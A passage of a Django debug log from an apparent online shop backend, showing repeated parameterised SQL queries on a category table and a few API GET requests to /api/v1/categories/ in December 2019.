"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:49:45,795 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:49:45,800 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:49:45,803 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:49:45,807 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:49:45,812 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:49:45,815 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:49:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:50:02,192 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:50:02,204 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:50:02,210 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:50:02,215 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:50:02,226 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:50:02,230 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:50:02,233 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:50:02,236 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 13:50:02,240 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:50:02,243 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:50:02,246 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:50:02,252 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) [19/Dec/2019 13:50:02] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 13:50:02,255 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:50:02,259 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:50:02,261 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:50:02,264 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:50:02,270 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:50:02,274 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:50:02,278 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:50:02,282 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:50:02,285 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:50:02,292 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:50:02,297 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:50:02,301 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:50:02,304 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:50:02,307 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:50:02,309 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:50:02,313 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:50:02,316 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:50:02,318 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:50:02,320 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:50:02,323 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:50:02,327 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:50:02,330 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:50:02,332 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:50:02,335 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:50:02,338 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:50:02,342 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:50:02,345 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:50:02,347 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:50:02,349 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:50:02,352 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:50:02,354 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:50:02,359 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:50:02,362 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:50:02,367 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:50:02,372 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:50:02,376 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:50:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:50:03,145 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-19 13:50:03,153 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) [19/Dec/2019 13:50:03] "GET /api/v1/categories/8 HTTP/1.0" 200 944 DEBUG 2019-12-19 13:50:03,184 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:50:03,196 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:50:03,204 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:50:03,208 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:50:03,216 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:50:03,220 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:50:03,224 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:50:03,229 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:50:03,233 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:50:03,240 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:50:03,244 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 